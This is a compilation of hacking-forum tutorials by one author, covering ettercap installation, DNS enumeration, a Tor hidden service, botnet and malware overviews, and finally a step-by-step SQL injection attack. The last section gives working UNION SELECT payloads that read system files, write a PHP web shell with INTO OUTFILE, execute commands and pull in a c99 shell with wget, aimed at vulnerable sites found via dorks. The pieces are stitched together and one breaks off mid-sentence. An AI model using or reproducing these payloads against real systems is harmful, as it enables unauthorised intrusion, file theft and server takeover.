Installing ettercap on Linux

Ettercap is a comprehensive suite for man in the middle attacks. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many protocols and includes many features for network and host analysis.

 sudo apt-get install ettercap

You will be prompted to choose between ettercap text-only and ettercap-graphical packages. Choose accordingly.

 For installing ettercap-graphical, use the command :

sudo apt-get install ettercap-graphical

For installing ettercap-text only, use the command :

sudo apt-get install ettercap-text-only

After the installation is done, you can open ettercap in different modes. For opening ettercap in graphic mode, use :

sudo ettercap -G

For text mode, use

sudo ettercap -T

To read about ettercap and its different modes, you can use :

man ettercap

Note : 'man' is short for manual. It can be used to read about all commands (description, syntax etc.)

Thankyou (zer0w0rm)

Dnsdict6 using information gathering tutorial

Hello guys 

Today I show you how to find DNS information Gathering using dnsdict6 tool.


Command is : dnsdict6
shows the DNS entries of a given url .


Command is : dnsdict6 -d4

show the nameserver (NS) and Mail exchanger (MX) records.
To see the NS & MX records , you have to use " -d " option
we use -4 options with the command which dump all the ipv4 addresses.


Command is : dnsdict6 -d46 -t 32 -x

This command will display the NS and MX records with their ipv4 and ipv6 addresses and the number of threads
we use is 32 and dictionary file size we used is xtreme .


A Service record (SRV record) is a specification of data in the Domain Name System defining the location,
i.e. the hostname and port number, of servers for specified servic

Thank you (zer0w0rm)

How to install google chrome in kali

1. Open IceWeasel Browser and goto and click on Install Google Chrome on the above right panel of the box. You can also goto to download Google Chrome.

2. Click on Download Chrome

3. Select the option to download package. As Kali is built on Debian package so you can select 32 bit .deb or 64 bit .deb (depending upon the type of platform Kali Linux install). I have 32 bit Kali Linux installed in my laptop, so I chose 32 bit .deb (For Debian/Ubuntu)

4. Choose the location to save google chrome package.

5. Open Terminal window (make sure you have a privilege of a root user) and goto the directory of the downloaded file google-chrome-stable_current_i386.deb.

6. Run dpkg -i google-chrome-stable_current_i386.deb from the root terminal window.

7. Once setup, you need to add it to Menu. Go to
Applications -> Accessories -> Main Menu

8.Click on the Internet icon on the left hand panel, and click the New Item button on the right.

9. On the next pop-up window, add the information as
Name: Google Chrome
Command: google-chrome
and click OK

10.When you are trying to run Chrome from the menu, you will get an error message pops up advising unable to run as root. So, to run as root you must specify an alternate --user-data-dir for storage of profile information.

11. To do that, navigate the file
Computer -> File System -> google -> chrome

Open the file google-chrome in a text editor and goto the last line;
add --user-data-dir, next to exec -a "$0" "$HERE/chrome" "$@"
Save the file and exit from text editor

12. Now open Applications -> Internet -> Google Chrome and you are good to go.

Thank you (zer0w0rm)

What is Botnets?


A botnet or robot network is a group of computers running a computer application controlled and manipulated only by the owner or the software source. The botnet may refer to a legitimate network of several computers that share program processing amongst them.

Usually though, when people talk about botnets, they are talking about a group of computers infected with the malicious kind of robot software, the bots, which present a security threat to the computer owner. Once the robot software (also known as malicious software or malware) has been successfully installed in a computer, this computer becomes a zombie or a drone, unable to resist the commands of the bot commander.

A botnet may be small or large depending on the complexity and sophistication of the bots used. A large botnet may be composed of ten thousand individual zombies. A small botnet, on the other hand may be composed of only a thousand drones. Usually, the owners of the zombie computers do not know that their computers and their computers’ resources are being remotely controlled and exploited by an individual or a group of malware runners through Internet Relay Chat (IRC)

There are various types of malicious bots that have already infected and are continuing to infect the internet. Some bots have their own spreaders – the script that lets them infect other computers (this is the reason why some people dub botnets as computer viruses) – while some smaller types of bots do not have such capabilities.

Different Types of Bots

Here is a list of the most used bots in the internet today, their features and command set.

XtremBot, Agobot, Forbot, Phatbot

These are currently the best known bots with more than 500 versions in the internet today. The bot is written using C++ with cross platform capabilities as a compiler and GPL as the source code. These bots can range from the fairly simple to highly abstract module-based designs. Because of its modular approach, adding commands or scanners to increase its efficiency in taking advantage of vulnerabilities is fairly easy. It can use libpcap packet sniffing library, NTFS ADS and PCRE. Agobot is quite distinct in that it is the only bot that makes use of other control protocols besides IRC.

UrXBot, SDBot, UrBot and RBot

Like the previous type of bot, these bots are published under GPL, but unlike the above mentioned bots these bots are less abstract in design and written in rudimentary C compiler language. Although its implementation is less varied and its design less sohisticated, these type of bots are well known and widely used in the internet.

GT-Bots and mIRC based bots
These bots have many versions in the internet mainly because mIRC is one of the most used IRC client for windows. GT stands for global threat and is the common name for bots scripted using mIRC. GT-bots make use of the mIRC chat client to launch a set of binaries (mainly DLLs) and scripts; their scripts often have the file extensions .mrc.
Malicious Uses of Botnets

Types Of Botnet Attack

Denial of Service Attacks
A botnet can be used as a distributed denial of service weapon. A botnet attacks a network or a computer system for the purpose of disrupting service through the loss of connectivity or consumption of the victim network’s bandwidth and overloading of the resources of the victim’s computer system. Botnet attacks are also used to damage or take down a competitor’s website.

Fast flux is a DNS technique used by botnets to hide phishing and malware delivery sites behind an ever-changing network of compromised hosts acting as proxies.
Any Internet service can be a target by botnets. This can be done through flooding the website with recursive HTTP or bulletin-board search queries. This mode of attack in which higher level protocols are utilized to increase the effects of an attack is also termed as spidering.

Its a software which sends information to its creators about a user's activities – typically passwords, credit card numbers and other information that can be sold on the black market. Compromised machines that are located within a corporate network can be worth more to the bot herder, as they can often gain access to confidential information held within that company. There have been several targeted attacks on large corporations with the aim of stealing sensitive information, one such example is the Aurora botnet.

Its exists to advertise some commercial entity actively and without the user's permission or awareness, for example by replacing banner ads on web pages with those of another content provider.

Spamming and Traffic Monitoring
A botnet can also be used to take advantage of an infected computer’s TCP/IP’s SOCKS proxy protocol for networking appications. After compromising a computer, the botnet commander can use the infected unit (a zombie) in conjunction with other zombies in his botnet (robot network) to harvest email addresses or to send massive amounts of spam or phishing mails.

Moreover, a bot can also function as a packet sniffer to find and intercept sensitive data passing through an infected machine. Typical data that these bots look out for are usernames and passwords which the botnet commander can use for his personal gain. Data about a competitor botnet installed in the same unit is also mined so the botnet commander can hijack this other botnet.

Access number replacements are where the botnet operator replaces the access numbers of a group of dial-up bots to that of a victim's phone number. Given enough bots partake in this attack, the victim is consistently bombarded with phone calls attempting to connect to the internet. Having very little to defend against this attack, most are forced into changing their phone numbers (land line, cell phone, etc.).

Keylogging and Mass Identity Theft
An encryption software within the victims’ units can deter most bots from harvesting any real information. Unfortunately, some bots have adapted to this by installing a keylogger program in the infected machines. With a keylogger program, the bot owner can use a filtering program to gather only the key sequence typed before or after interesting keywords like PayPal or Yahoo mail. This is one of the reasons behind the massive PayPal accounts theft for the past several years.

Bots can also be used as agents for mass identity theft. It does this through phishing or pretending to be a legitimate company in order to convince the user to submit personal information and passwords. A link in these phishing mails can also lead to fake PayPal, eBay or other websites to trick the user into typing in the username and password.

Botnet Spread
Botnets can also be used to spread other botnets in the network. It does this by convincing the user to download after which the program is executed through FTP, HTTP or email.

Pay-Per-Click Systems Abuse
Botnets can be used for financial gain by automating clicks on a pay-per-click system. Compromised units can be used to click automatically on a site upon activation of a browser. For this reason, botnets are also used to earn money from Google’s Adsense and other affiliate programs by using zombies to artificially increase the click counter of an advertisement.

Thank you (zer0w0rm)

How to build web site using tor network

Not a lot of people know about .onion websites, not many people actually use it. 
ONION websites are used by people who want to stay anonymous.

First of All let's start with the requirements:

1.Tor Installed (For Windows) OR Downloaded and extracted (Linux)

2. A Server like Apache. (Windows users are advised to use XAMPP and Linux users, you can simply install Apache2 on your machine.)

3.Text Editor.

If you have all the above, then you're ready to go!

First of all run Tor to make sure it's working:

If it's working, then that's good you're good to go for the next step.
Stop and close Tor for now, Then Open the following file:


C:\Tor Browser\Data\Tor\torrc

open the extracted folder from tor > Data > Tor > torrc

Then add the following text at the bottom of the file:


# Hidden Service
HiddenServiceDir C:\Users\UserName\tor_service
HiddenServicePort 80


# Hidden Service
HiddenServiceDir /root/tor_service
HiddenServicePort 80

You can change from root to any user you are using.
Now make the directory in the path you added in torrc (tor_service)
Now start you apache server and make sure it's working!
If it's working, start Tor! Check Log Message to check that there was no error starting it!
No errors! Now check the folder that you created "tor_service" You will find two files!
Open the file "hostname" and you will find you .onion link!!

This link is now working and ONLY ACCESSIBLE for Tor users! Want to test it? Open tor, and access it!

Thank you (zer0w0rm)

The List of Malware Types

List of Common Malware Types:

This list of Malware types only scratches the surface in that Malware is being developed by those trying to gain access to your computer for monetary gain. The list of Malware types focuses on the most common and the general categories of infection

Adware: The least dangerous and most lucrative Malware. Adware displays ads on your computer.

Spyware: Spyware is software that spies on you, tracking your internet activities in order to send advertising (Adware) back to your system.

Virus: A virus is a contagious program or code that attaches itself to another piece of software, and then reproduces itself when that software is run. Most often this is spread by sharing software or files between computers.

Worm: A program that replicates itself and destroys data and files on the computer. Worms work to “eat” the system operating files and data files until the drive is empty.

Trojan: The most dangerous Malware. Trojans are written with the purpose of discovering your financial information, taking over your computer’s system resources, and in larger systems creating a “denial-of-service attack ” Denial-of-service attack: an attempt to make a machine or network resource unavailable to those attempting to reach it. Example: AOL, Yahoo or your business network becoming unavailable.

Rootkit: This one is likened to the burglar hiding in the attic, waiting to take from you while you are not home. It is the hardest of all Malware to detect and therefore to remove; many experts recommend completely wiping your hard drive and reinstalling everything from scratch. It is designed to permit the other information gathering Malware in to get the identity information from your computer without you realizing anything is going on.

Backdoors: Backdoors are much the same as Trojans or worms, except that they open a “backdoor” onto a computer, providing a network connection for hackers or other Malware to enter or for viruses or SPAM to be sent.

Keyloggers: Records everything you type on your PC in order to glean your log-in names, passwords, and other sensitive information, and send it on to the source of the keylogging program. Many times keyloggers are used by corporations and parents to acquire computer usage information.  
Rogue security software: This one deceives or misleads users. It pretends to be a good program to remove Malware infections, but all the while it is the Malware. Often it will turn off the real Anti-Virus software. The next image shows the typical screen for this Malware program, Antivirus 2010

Ransomware: If you see this screen that warns you that you have been locked out of your computer until you pay for your cybercrimes. Your system is severely infected with a form of Malware called Ransomware. It is not a real notification from the FBI, but, rather an infection of the system itself. Even if you pay to unlock the system, the system is unlocked, but you are not free of it locking you out again. The request for money, usually in the hundreds of dollars is completely fake.

Browser Hijacker:  When your homepage changes to one that looks like those in the images inserted next, you may have been infected with one form or another of a Browser Hijacker. This dangerous Malware will redirect your normal search activity and give you the results the developers want you to see. Its intention is to make money off your web surfing. Using this homepage and not removing the Malware lets the source developers capture your surfing interests. This is especially dangerous when banking or shopping online. These homepages can look harmless, but in every case they allow other more infectious 



First of all find a website which is vulnerable to sql injection. You can find websites by dorks or manually like i have found this.

You need 2 main things:

Root Path of the website 
A Writable Directory 
Most of the time, you will see root path in SQL error of that site.Like the following one.

Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean given in /home/zero/public_html/admin/requires/functions.php on line 1327

Well If the vulnerable website doesn't show the root path then don't worry i will show you how to know the root path. And Also Writable Directory.'

I am not starting with abc of SQLI I hope u know the basics. 
Now we have to found columns of the website then vulnerable columns like my site have 5 columns And 3 is the vulnerable column UniOn SeleCt 1,2,3,4,5-- UniOn SeleCt 1,2,version(),4,5--

Let's Try To Load Files Of The Website UniOn SeleCt 1,2,load_file('/etc/passwd'),4,5-- UniOn SeleCt 1,2,load_file('/etc/my.cnf'),4,5-- UniOn SeleCt 1,2,load_file('/etc/group'),4,5-- UniOn SeleCt 1,2,load_file('/etc/services'),4,5-- UniOn SeleCt 1,2,load_file('/etc/hosts'),4,5--

We Won't Need To Read Any Files Mentioned above just to increase your knowledge. Now we have to check the file privileges for the current user for this first you have to find current username.
Like This UniOn SeleCt 1,2,current_user,4,5--

Our Current Username is etc mine is zer0w0m
Now Check File Privilages for User zer0w0rm UniOn SeleCt 1,2,file_priv,4,5 FROM mysql.user WHERE user='zer0w0rm'--

If it shows Y (yes) on the vulnerable column of the website that means we have the file privileges for the current user zero0w0rm
And if it doesn't show Y then Don't waste your time there :D

Ok Now we need to know the root path for this webserver. So, for this information we need to know the webserver type.For this you can use firefox adon server spy.

Server Spy Addones :
You can use havij and some other tool too to detect webserver type. 

To know the webserver by file /etc/passwd use this query UniOn SeleCt 1,2,3,load_file('/etc/passwd'),5--

now we have our webserver etc (/home/zero0w0rm)
now read one more file. UniOn SeleCt 1,2,load_file('etc/zero0w0rm.conf')4,5--

Where zero0w0rm is your webserver software name like server name.conf .

now we have the root path

/home/ etc.

Now we have to find a writeable directory for this you can use google dorks as well and your knowledge too :D


so its

now we will upload our evil code UniOn SeleCt 1,2,"<?system($_REQUEST['cmd']);?>",4,5 into outfile '/home/site/public_html/zero0w0rm/writeable directory/zero0w0rm.php'--+

ok now we have to execute our commands directory/zer0w0rm.php?cmd=pwd directory/zer0w0rm.php?cmd=uname -a

Now we will use wget command to upload our evil script directory/zero0w0rm.php?cmd=wget

Now we will rename our c99.txt to php in order to execute it :D directory/zero0w0rm.php?cmd=mv c99.txt c99.php

now open it directory/c99.php VOILA OUR SHELL GOT LIVE :D

Note: In our experience, Windows servers are easy to shell with SQL queries.

Thank you (zer0w0rm)